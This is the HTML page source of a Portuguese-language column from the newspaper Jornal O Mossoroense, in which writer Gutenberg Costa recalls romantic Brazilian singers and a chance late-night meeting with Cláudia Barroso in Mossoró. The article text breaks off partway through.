<!DOCTYPE html>
<!--[if IE 8]>
<html class="ie ie8" lang="pt-BR"> <![endif]-->
<!--[if IE 9]>
<html class="ie ie9" lang="pt-BR"> <![endif]-->
<!--[if gt IE 9]><!-->
<html lang="pt-BR"> <!--<![endif]-->
<head>
<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="pingback" href="https://www.omossoroense.com.br/xmlrpc.php"/>
<title>A Vida é Mesmo Assim! &#8211; Jornal O Mossoroense</title>
<meta name='robots' content='max-image-preview:large' />
<!-- Better Open Graph, Schema.org & Twitter Integration -->
<meta property="og:locale" content="pt_br"/>
<meta property="og:site_name" content="Jornal O Mossoroense"/>
<meta property="og:url" content="https://www.omossoroense.com.br/a-vida-e-mesmo-assim/"/>
<meta property="og:title" content="A Vida é Mesmo Assim!"/>
<meta property="og:image" content="https://www.omossoroense.com.br/wp-content/uploads/2021/09/QJ9XspOMHoD0CnPS4yRfGLFNmdi1PURLsGxLRBWd-1024x683.jpeg"/>
<meta property="article:section" content="Gutenberg Costa"/>
<meta property="og:description" content="Neste domingo, vou puxar pela memória sessentona e relembrar algumas cantoras que assisti em shows. Todas vozes consagradas da nossa excelente música popular romântica brasileira. Não venham aqui chama-las de ‘bregas’, porque vão comprar comigo uma g"/>
<meta property="og:type" content="article"/>
<meta name="twitter:card" content="summary"/>
<meta name="twitter:url" content="https://www.omossoroense.com.br/a-vida-e-mesmo-assim/"/>
<meta name="twitter:title" content="A Vida é Mesmo Assim!"/>
<meta name="twitter:description" content="Neste domingo, vou puxar pela memória sessentona e relembrar algumas cantoras que assisti em shows. Todas vozes consagradas da nossa excelente música popular romântica brasileira. Não venham aqui chama-las de ‘bregas’, porque vão comprar comigo uma g"/>
<meta name="twitter:image" content="https://www.omossoroense.com.br/wp-content/uploads/2021/09/QJ9XspOMHoD0CnPS4yRfGLFNmdi1PURLsGxLRBWd-1024x683.jpeg"/>
<!-- / Better Open Graph, Schema.org & Twitter Integration. -->
<link rel='dns-prefetch' href='//www.googletagmanager.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Feed para Jornal O Mossoroense &raquo;" href="https://www.omossoroense.com.br/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Jornal O Mossoroense &raquo;" href="https://www.omossoroense.com.br/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="Feed de comentários para Jornal O Mossoroense &raquo; A Vida é Mesmo Assim!" href="https://www.omossoroense.com.br/a-vida-e-mesmo-assim/feed/" />
<script type="text/javascript">var $TS_VCSC_CurrentPluginRelease = "5.6.0";var $TS_VCSC_CurrentComposerRelease = "6.4.1";var $TS_VCSC_Lightbox_Activated = true;var $TS_VCSC_Lightbox_Thumbs = "bottom";var $TS_VCSC_Lightbox_Thumbsize = 50;var $TS_VCSC_Lightbox_Animation = "random";var $TS_VCSC_Lightbox_Captions = "data-title";var $TS_VCSC_Lightbox_Closer = true;var $TS_VCSC_Lightbox_Durations = 5000;var $TS_VCSC_Lightbox_Share = false;var $TS_VCSC_Lightbox_Save = false;var $TS_VCSC_Lightbox_LoadAPIs = true;var $TS_VCSC_Lightbox_Social = "fb,tw,gp,pin";var $TS_VCSC_Lightbox_NoTouch = false;var $TS_VCSC_Lightbox_BGClose = true;var $TS_VCSC_Lightbox_NoHashes = true;var $TS_VCSC_Lightbox_Keyboard = true;var $TS_VCSC_Lightbox_FullScreen = true;var $TS_VCSC_Lightbox_Zoom = true;var $TS_VCSC_Lightbox_FXSpeed = 300;var $TS_VCSC_Lightbox_Scheme = "dark";var $TS_VCSC_Lightbox_Controls = "circle";var $TS_VCSC_Lightbox_URLColor = false;var $TS_VCSC_Lightbox_Backlight = "#ffffff";var $TS_VCSC_Lightbox_UseColor = false;var $TS_VCSC_Lightbox_Overlay = "#000000";var $TS_VCSC_Lightbox_Background = "";var $TS_VCSC_Lightbox_Repeat = "no-repeat";var $TS_VCSC_Lightbox_Noise = "";var $TS_VCSC_Lightbox_CORS = false;var $TS_VCSC_Lightbox_Tapping = true;var $TS_VCSC_Lightbox_ScrollBlock = "js";var $TS_VCSC_Lightbox_Protection = "none";var $TS_VCSC_Lightbox_HistoryClose = false;var $TS_VCSC_Lightbox_CustomScroll = true;var $TS_VCSC_Lightbox_HomeURL = "https://www.omossoroense.com.br";var $TS_VCSC_Lightbox_LastScroll = 0;var $TS_VCSC_Lightbox_Showing = false;var $TS_VCSC_Lightbox_PrettyPhoto = false;var $TS_VCSC_Lightbox_AttachAllOther = false;var $TS_VCSC_Hammer_ReleaseNew = true;</script>		<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.1.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.omossoroense.com.br\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.8.1"}};
!function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode;p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0);e=i.toDataURL();return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(!p||!p.fillText)return!1;switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([10084,65039,8205,55357,56613],[10084,65039,8203,55357,56613])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source||{}).concatemoji?c(n.concatemoji):n.wpemoji&&n.twemoji&&(c(n.twemoji),c(n.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<!-- <link rel='stylesheet' id='wp-block-library-css'  href='https://www.omossoroense.com.br/wp-includes/css/dist/block-library/style.min.css?ver=5.8.1' type='text/css' media='all' /> -->
<!-- <link rel='stylesheet' id='ms-main-css'  href='https://www.omossoroense.com.br/wp-content/plugins/masterslider/public/assets/css/masterslider.main.css?ver=3.4.4' type='text/css' media='all' /> -->
<!-- <link rel='stylesheet' id='ms-custom-css'  href='https://www.omossoroense.com.br/wp-content/uploads/masterslider/custom.css?ver=2.2' type='text/css' media='all' /> -->
<link rel="stylesheet" type="text/css" href="//www.omossoroense.com.br/wp-content/cache/wpfc-minified/2yhwipmt/h5j8h.css" media="all"/>
<link rel='stylesheet' id='better-framework-main-fonts-css'  href='https://fonts.googleapis.com/css?family=Lato:400,700,900%7CRoboto:400,500,400italic%7COpen+Sans:400' type='text/css' media='all' />
<script src='//www.omossoroense.com.br/wp-content/cache/wpfc-minified/7ip7nabo/6etmp.js' type="text/javascript"></script>
<!-- <script type='text/javascript' src='https://www.omossoroense.com.br/wp-includes/js/jquery/jquery.min.js?ver=3.6.0' id='jquery-core-js'></script> -->
<!-- <script type='text/javascript' src='https://www.omossoroense.com.br/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script> -->
<!-- Google Analytics snippet added by Site Kit -->
<script type='text/javascript' src='https://www.googletagmanager.com/gtag/js?id=UA-3507934-2' id='google_gtagjs-js' async></script>
<script type='text/javascript' id='google_gtagjs-js-after'>
window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
gtag('set', 'linker', {"domains":["www.omossoroense.com.br"]} );
gtag("js", new Date());
gtag("set", "developer_id.dZTNiMT", true);
gtag("config", "UA-3507934-2", {"anonymize_ip":true});
</script>
<!-- End Google Analytics snippet added by Site Kit -->
<!--[if lt IE 9]>
<script type='text/javascript' src='https://www.omossoroense.com.br/wp-content/themes/publisher/includes/libs/better-framework/assets/js/html5shiv.min.js?ver=3.10.22' id='bf-html5shiv-js'></script>
<![endif]-->
<!--[if lt IE 9]>
<script type='text/javascript' src='https://www.omossoroense.com.br/wp-content/themes/publisher/includes/libs/better-framework/assets/js/respond.min.js?ver=3.10.22' id='bf-respond-js'></script>
<![endif]-->
<link rel="https://api.w.org/" href="https://www.omossoroense.com.br/wp-json/" /><link rel="alternate" type="application/json" href="https://www.omossoroense.com.br/wp-json/wp/v2/posts/82396" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://www.omossoroense.com.br/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://www.omossoroense.com.br/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 5.8.1" />
<link rel="canonical" href="https://www.omossoroense.com.br/a-vida-e-mesmo-assim/" />
<link rel='shortlink' href='https://www.omossoroense.com.br/?p=82396' />
<link rel="alternate" type="application/json+oembed" href="https://www.omossoroense.com.br/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.omossoroense.com.br%2Fa-vida-e-mesmo-assim%2F" />
<link rel="alternate" type="text/xml+oembed" href="https://www.omossoroense.com.br/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.omossoroense.com.br%2Fa-vida-e-mesmo-assim%2F&#038;format=xml" />
<meta name="generator" content="Site Kit by Google 1.41.0" /><script>var ms_grabbing_curosr='https://www.omossoroense.com.br/wp-content/plugins/masterslider/public/assets/css/common/grabbing.cur',ms_grab_curosr='https://www.omossoroense.com.br/wp-content/plugins/masterslider/public/assets/css/common/grab.cur';</script>
<meta name="generator" content="MasterSlider 3.4.4 - Responsive Touch Image Slider" />
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-3507934-2"></script>
<script>
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}
gtag('js', new Date());
gtag('config', 'UA-3507934-2');
</script>			<link rel="shortcut icon" href="https://www.omossoroense.com.br/wp-content/uploads/2020/10/favicon.jpg"><meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/>
<script type="application/ld+json">{
"@context": "http:\/\/schema.org\/",
"@type": "Organization",
"@id": "#organization",
"logo": {
"@type": "ImageObject",
"url": "https:\/\/www.omossoroense.com.br\/wp-content\/uploads\/2021\/04\/LOGO-O-MOSSOROENSE-EM-ALTA-22.png"
},
"url": "https:\/\/www.omossoroense.com.br\/",
"name": "Jornal O Mossoroense",
"description": "Jornal de Mossor\u00f3-RN fundado em 1872"
}</script>
<script type="application/ld+json">{
"@context": "http:\/\/schema.org\/",
"@type": "WebSite",
"name": "Jornal O Mossoroense",
"alternateName": "Jornal de Mossor\u00f3-RN fundado em 1872",
"url": "https:\/\/www.omossoroense.com.br\/"
}</script>
<script type="application/ld+json">{
"@context": "http:\/\/schema.org\/",
"@type": "BlogPosting",
"headline": "A Vida \u00e9 Mesmo Assim!",
"description": "Neste domingo, vou puxar pela mem\u00f3ria sessentona e relembrar algumas cantoras que assisti em shows. Todas vozes consagradas da nossa excelente m\u00fasica popular rom\u00e2ntica brasileira. N\u00e3o venham aqui chama-las de \u2018bregas\u2019, porque v\u00e3o comprar comigo uma g",
"datePublished": "2021-09-26",
"dateModified": "2021-09-24",
"author": {
"@type": "Person",
"@id": "#person-Reportagem",
"name": "Reportagem"
},
"image": {
"@type": "ImageObject",
"url": "https:\/\/www.omossoroense.com.br\/wp-content\/uploads\/2021\/09\/QJ9XspOMHoD0CnPS4yRfGLFNmdi1PURLsGxLRBWd-scaled.jpeg",
"width": 2560,
"height": 1707
},
"interactionStatistic": [
{
"@type": "InteractionCounter",
"interactionType": "http:\/\/schema.org\/CommentAction",
"userInteractionCount": "0"
}
],
"publisher": {
"@id": "#organization"
},
"mainEntityOfPage": "https:\/\/www.omossoroense.com.br\/a-vida-e-mesmo-assim\/"
}</script>
<!-- <link rel='stylesheet' id='bf-minifed-css-1' href='https://www.omossoroense.com.br/wp-content/bs-booster-cache/d7d95734370fda958090822b789ed8c4.css' type='text/css' media='all' /> -->
<!-- <link rel='stylesheet' id='7.7.0-1632580373' href='https://www.omossoroense.com.br/wp-content/bs-booster-cache/177465c286fbd82ec96be693da5f519c.css' type='text/css' media='all' /> -->
<link rel="stylesheet" type="text/css" href="//www.omossoroense.com.br/wp-content/cache/wpfc-minified/zgt73gd/aaeec.css" media="all"/>
<!-- BetterFramework Head Inline CSS -->
<style>
.topbar .better-social-counter.style-button .social-item .item-icon {
font-size: 16px;
}
.main-menu>li>a {
padding: 0 10px;
}
</style>
<!-- /BetterFramework Head Inline CSS-->
<noscript><style> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript>	</head>
<body class="post-template-default single single-post postid-82396 single-format-standard _masterslider _msp_version_3.4.4 bs-theme bs-publisher bs-publisher-clean-magazine active-light-box active-top-line ltr close-rh page-layout-2-col-right boxed main-menu-sticky-smart active-ajax-search single-prim-cat-14994 single-cat-14994  bs-show-ha bs-show-ha-a wpb-js-composer js-comp-ver-6.4.1 vc_responsive bs-ll-a" dir="ltr">
<div class="main-wrap content-main-wrap">
<header id="header" class="site-header header-style-2 boxed" itemscope="itemscope" itemtype="https://schema.org/WPHeader">
<section class="topbar topbar-style-1 hidden-xs hidden-xs">
<div class="content-wrap">
<div class="container">
<div class="topbar-inner clearfix">
<div class="section-links">
<div  class="  better-studio-shortcode bsc-clearfix better-social-counter style-button not-colored in-4-col">
<ul class="social-list bsc-clearfix"><li class="social-item facebook"><a href = "https://www.facebook.com/omossoroense" target = "_blank" > <i class="item-icon bsfi-facebook" ></i><span class="item-title" > Likes </span> </a> </li> <li class="social-item twitter"><a href = "https://twitter.com/O_Mossoroense" target = "_blank" > <i class="item-icon bsfi-twitter" ></i><span class="item-title" > Followers </span> </a> </li> <li class="social-item youtube"><a href = "https://youtube.com/channel/UCXtdoH78TmHMvaCn4ryrKzA" target = "_blank" > <i class="item-icon bsfi-youtube" ></i><span class="item-title" > Subscribers </span> </a> </li> <li class="social-item instagram"><a href = "https://instagram.com/omossoroense" target = "_blank" > <i class="item-icon bsfi-instagram" ></i><span class="item-title" > Followers </span> </a> </li> 			</ul>
</div>
</div>
<div class="section-menu">
<div id="menu-top" class="menu top-menu-wrapper" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
<nav class="top-menu-container">
<ul id="top-navigation" class="top-menu menu clearfix bsm-pure">
<li id="topbar-date" class="menu-item menu-item-date">
<span
class="topbar-date">domingo,  26 de setembro de 2021</span>
</li>
</ul>
</nav>
</div>
</div>
</div>
</div>
</div>
</section>
<div class="header-inner">
<div class="content-wrap">
<div class="container">
<div class="row">
<div class="row-height">
<div class="logo-col col-xs-4">
<div class="col-inside">
<div id="site-branding" class="site-branding">
<p  id="site-title" class="logo h1 img-logo">
<a href="https://www.omossoroense.com.br/" itemprop="url" rel="home">
<img id="site-logo" src="https://www.omossoroense.com.br/wp-content/uploads/2021/04/LOGO-O-MOSSOROENSE-EM-ALTA-22.png"
alt="Publisher"  />
<span class="site-title">Publisher - Jornal de Mossoró-RN fundado em 1872</span>
</a>
</p>
</div><!-- .site-branding -->
</div>
</div>
<div class="sidebar-col col-xs-8">
<div class="col-inside">
<aside id="sidebar" class="sidebar" role="complementary" itemscope="itemscope" itemtype="https://schema.org/WPSideBar">
<div class="fcgjulb fcgjulb-clearfix fcgjulb-pubadban fcgjulb-show-desktop fcgjulb-show-tablet-portrait fcgjulb-show-tablet-landscape fcgjulb-show-phone fcgjulb-loc-header_aside_logo fcgjulb-align-right fcgjulb-column-1"><div id="fcgjulb-74108-2053896868" class="fcgjulb-container fcgjulb-type-image " itemscope="" itemtype="https://schema.org/WPAdBlock" data-adid="74108" data-type="image"><a itemprop="url" class="fcgjulb-link" href="http://www.rn.gov.br" target="_blank" ><img class="fcgjulb-image" src="https://www.omossoroense.com.br/wp-content/uploads/2021/06/1300x180px.png" alt="Governo RN" /></a></div></div>										</aside>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div id="menu-main" class="menu main-menu-wrapper show-search-item menu-actions-btn-width-1" role="navigation" itemscope="itemscope" itemtype="https://schema.org/SiteNavigationElement">
<div class="main-menu-inner">
<div class="content-wrap">
<div class="container">
<nav class="main-menu-container">
<ul id="main-navigation" class="main-menu menu bsm-pure clearfix">
<li id="menu-item-61427" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-term-12 better-anim-fade menu-item-61427"><a href="https://www.omossoroense.com.br/category/o-jornal/">O Jornal</a>
<ul class="sub-menu">
<li id="menu-item-66521" class="menu-item menu-item-type-post_type menu-item-object-page current_page_parent better-anim-fade menu-item-66521"><a href="https://www.omossoroense.com.br/expediente/">Expediente</a></li>
<li id="menu-item-66525" class="menu-item menu-item-type-post_type menu-item-object-page better-anim-fade menu-item-66525"><a href="https://www.omossoroense.com.br/o-jornal-dos-escossias-2/">Histórico</a></li>
</ul>
</li>
<li id="menu-item-59120" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-8 better-anim-fade menu-item-59120"><a href="https://www.omossoroense.com.br/category/cotidiano/">Cotidiano</a></li>
<li id="menu-item-59123" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-18 better-anim-fade menu-item-59123"><a href="https://www.omossoroense.com.br/category/regional/">Regional</a></li>
<li id="menu-item-59126" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-15 better-anim-fade menu-item-59126"><a href="https://www.omossoroense.com.br/category/policia/">Polícia</a></li>
<li id="menu-item-59122" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-16 better-anim-fade menu-item-59122"><a href="https://www.omossoroense.com.br/category/politica/">Política</a></li>
<li id="menu-item-59124" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-10 better-anim-fade menu-item-59124"><a href="https://www.omossoroense.com.br/category/esporte/">Esporte</a></li>
<li id="menu-item-59121" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-7 better-anim-fade menu-item-59121"><a href="https://www.omossoroense.com.br/category/brasil/">Brasil</a></li>
<li id="menu-item-59125" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-11 better-anim-fade menu-item-59125"><a href="https://www.omossoroense.com.br/category/mundo/">Mundo</a></li>
<li id="menu-item-59141" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor menu-item-has-children menu-term-6 better-anim-fade menu-item-59141"><a href="https://www.omossoroense.com.br/category/artigos/">Artigos</a>
<ul class="sub-menu">
<li id="menu-item-69879" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-term-14994 better-anim-fade menu-item-69879"><a href="https://www.omossoroense.com.br/category/artigos/gutenberg-costa/">Gutenberg Costa</a></li>
<li id="menu-item-71290" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-15092 better-anim-fade menu-item-71290"><a href="https://www.omossoroense.com.br/category/artigos/nilo-emerenciano/">Nilo Emerenciano</a></li>
<li id="menu-item-69980" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-14995 better-anim-fade menu-item-69980"><a href="https://www.omossoroense.com.br/category/artigos/rodrigo-de-carvalho/">Rodrigo de Carvalho</a></li>
<li id="menu-item-69440" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-14983 better-anim-fade menu-item-69440"><a href="https://www.omossoroense.com.br/category/artigos/tomislav-r-femenick-artigos/">Tomislav R. Femenick</a></li>
</ul>
</li>
<li id="menu-item-66526" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-term-14852 better-anim-fade menu-item-66526"><a href="https://www.omossoroense.com.br/category/colunas/">Colunas</a>
<ul class="sub-menu">
<li id="menu-item-74504" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-15281 better-anim-fade menu-item-74504"><a href="https://www.omossoroense.com.br/category/artigos/jose-de-paiva-netto/">José de Paiva Netto</a></li>
<li id="menu-item-69763" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-28 better-anim-fade menu-item-69763"><a href="https://www.omossoroense.com.br/category/colunas/apodi/">Josy Maia</a></li>
<li id="menu-item-69060" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-14959 better-anim-fade menu-item-69060"><a href="https://www.omossoroense.com.br/category/colunas/lairinho-rosado/">Lahyre Neto</a></li>
<li id="menu-item-66530" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-49 better-anim-fade menu-item-66530"><a href="https://www.omossoroense.com.br/category/colunas/laire-rosado/">Laíre Rosado</a></li>
<li id="menu-item-66532" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-53 better-anim-fade menu-item-66532"><a href="https://www.omossoroense.com.br/category/colunas/notas-da-redacao/">Notas da Redação</a></li>
<li id="menu-item-68856" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-17 better-anim-fade menu-item-68856"><a href="https://www.omossoroense.com.br/category/colunas/reflexoes-teologicas/">Reflexões Teológicas</a></li>
<li id="menu-item-76251" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-15360 better-anim-fade menu-item-76251"><a href="https://www.omossoroense.com.br/category/colunas/toque-esportivo-com-sergio-oliveira/">Toque Esportivo com Sérgio Oliveira</a></li>
</ul>
</li>
<li id="menu-item-59135" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-term-21 better-anim-fade menu-item-59135"><a href="https://www.omossoroense.com.br/category/universo/">Universo</a>
<ul class="sub-menu">
<li id="menu-item-67744" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-14866 better-anim-fade menu-item-67744"><a href="https://www.omossoroense.com.br/category/universo/caio-cesar-muniz-universo/">Caio César Muniz</a></li>
<li id="menu-item-59139" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-37 better-anim-fade menu-item-59139"><a href="https://www.omossoroense.com.br/category/universo/clauder-arcanjo/">Clauder Arcanjo</a></li>
<li id="menu-item-67745" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-14912 better-anim-fade menu-item-67745"><a href="https://www.omossoroense.com.br/category/universo/entrevista/">Entrevista</a></li>
<li id="menu-item-68857" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-46 better-anim-fade menu-item-68857"><a href="https://www.omossoroense.com.br/category/universo/geraldo-maia/">Geraldo Maia</a></li>
<li id="menu-item-67746" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-14864 better-anim-fade menu-item-67746"><a href="https://www.omossoroense.com.br/category/universo/poesia-universo/">Poesia</a></li>
<li id="menu-item-75721" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-15339 better-anim-fade menu-item-75721"><a href="https://www.omossoroense.com.br/category/universo/renann-targino/">Renann Targino</a></li>
<li id="menu-item-66534" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-term-26 better-anim-fade menu-item-66534"><a href="https://www.omossoroense.com.br/category/universo/wilson-bezerra/">Wilson Bezerra</a></li>
</ul>
</li>
</ul><!-- #main-navigation -->
<div class="menu-action-buttons width-1">
<div class="search-container close">
<span class="search-handler"><i class="fa fa-search"></i></span>
<div class="search-box clearfix">
<form role="search" method="get" class="search-form clearfix" action="https://www.omossoroense.com.br">
<input type="search" class="search-field"
placeholder="Pesquisa..."
value="" name="s"
title="Procurar por:"
autocomplete="off">
<input type="submit" class="search-submit" value="Pesquisa">
</form><!-- .search-form -->
</div>
</div>
</div>
</nav><!-- .main-menu-container -->
</div>
</div>
</div>
</div><!-- .menu -->
</header><!-- .header -->
<div class="rh-header clearfix light deferred-block-exclude">
<div class="rh-container clearfix">
<div class="menu-container close">
<span class="menu-handler"><span class="lines"></span></span>
</div><!-- .menu-container -->
<div class="logo-container rh-img-logo">
<a href="https://www.omossoroense.com.br/" itemprop="url" rel="home">
<img src="https://www.omossoroense.com.br/wp-content/uploads/2020/10/logo-jornal.png"
alt="Jornal O Mossoroense"  />				</a>
</div><!-- .logo-container -->
</div><!-- .rh-container -->
</div><!-- .rh-header -->
<div class="content-wrap">
<main id="content" class="content-container">
<div class="container layout-2-col layout-2-col-1 layout-right-sidebar post-template-10">
<div class="row main-section">
<div class="col-sm-8 content-column">
<div class="single-container">
<article id="post-82396" class="post-82396 post type-post status-publish format-standard has-post-thumbnail  category-gutenberg-costa single-post-content">
<div class="single-featured"><a class="post-thumbnail open-lightbox" href="https://www.omossoroense.com.br/wp-content/uploads/2021/09/QJ9XspOMHoD0CnPS4yRfGLFNmdi1PURLsGxLRBWd-scaled.jpeg"><img  alt="" data-src="https://www.omossoroense.com.br/wp-content/uploads/2021/09/QJ9XspOMHoD0CnPS4yRfGLFNmdi1PURLsGxLRBWd-750x430.jpeg">											</a>
</div>
<div class="post-header-inner">
<div class="post-header-title">
<div class="term-badges floated"><span class="term-badge term-14994"><a href="https://www.omossoroense.com.br/category/artigos/gutenberg-costa/">Gutenberg Costa</a></span></div>											<h1 class="single-post-title">
<span class="post-title" itemprop="headline">A Vida é Mesmo Assim!</span>
</h1>
<h2 class="post-subtitle">Gutenberg Costa – Escritor, pesquisador e folclorista.</h2><div class="post-meta single-post-meta">
<span class="time"><time class="post-published updated"
datetime="2021-09-24T14:22:26-03:00">Last updated <b>24 de setembro de 2021</b></time></span>
</div>
</div>
</div>
<div class="post-share single-post-share top-share clearfix style-1">
<div class="post-share-btn-group">
</div>
<div class="share-handler-wrap ">
<span class="share-handler post-share-btn rank-default">
<i class="bf-icon  fa fa-share-alt"></i>						<b class="text">Share</b>
</span>
<span class="social-item facebook"><a href="https://www.facebook.com/sharer.php?u=https%3A%2F%2Fwww.omossoroense.com.br%2Fa-vida-e-mesmo-assim%2F" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-facebook','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-facebook"></i></span></a></span><span class="social-item twitter"><a href="https://twitter.com/share?text=A Vida é Mesmo Assim! @O_Mossoroense&url=https%3A%2F%2Fwww.omossoroense.com.br%2Fa-vida-e-mesmo-assim%2F" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-twitter','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-twitter"></i></span></a></span><span class="social-item whatsapp"><a href="whatsapp://send?text=A Vida é Mesmo Assim! %0A%0A https%3A%2F%2Fwww.omossoroense.com.br%2Fa-vida-e-mesmo-assim%2F" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-whatsapp','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-whatsapp"></i></span></a></span><span class="social-item telegram"><a href="https://telegram.me/share/url?url=https%3A%2F%2Fwww.omossoroense.com.br%2Fa-vida-e-mesmo-assim%2F&text=A Vida é Mesmo Assim!" target="_blank" rel="nofollow noreferrer" class="bs-button-el" onclick="window.open(this.href, 'share-telegram','left=50,top=50,width=600,height=320,toolbar=0'); return false;"><span class="icon"><i class="bf-icon fa fa-send"></i></span></a></span></div>		</div>
<div class="entry-content clearfix single-post-content">
<p><img class="size-medium wp-image-82397 alignleft"  data-src="https://www.omossoroense.com.br/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-23-at-15.30.36-277x300.jpeg" alt="" width="277" height="300" srcset="https://www.omossoroense.com.br/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-23-at-15.30.36-277x300.jpeg 277w, https://www.omossoroense.com.br/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-23-at-15.30.36-944x1024.jpeg 944w, https://www.omossoroense.com.br/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-23-at-15.30.36-768x833.jpeg 768w, https://www.omossoroense.com.br/wp-content/uploads/2021/09/WhatsApp-Image-2021-09-23-at-15.30.36.jpeg 1144w" sizes="(max-width: 277px) 100vw, 277px" />Neste domingo, vou puxar pela memória sessentona e relembrar algumas cantoras que assisti em shows. Todas vozes consagradas da nossa excelente música popular romântica brasileira. Não venham aqui chama-las de ‘bregas’, porque vão comprar comigo uma grandiosa briga. Meu encontro com a galega cantora e compositora do meu tempo, Claúdia Barroso, uma das amadas da vida do nosso Dom Juan, o baiano cantor e compositor Waldick Soriano. Mineira de Pirapetinga, nascida em 23 de abril de 1932, não foi em show, mas em um restaurante/bar de um hotel em Mossoró, testemunhado por dois grandes amigos, Cid Augusto e Caio César Muniz. Os bares mossoroense foram fechando e já pela madrugada, demos de cara com a Cláudia. Coincidências da vida, lá estava a mesma jantando em uma das mesas do 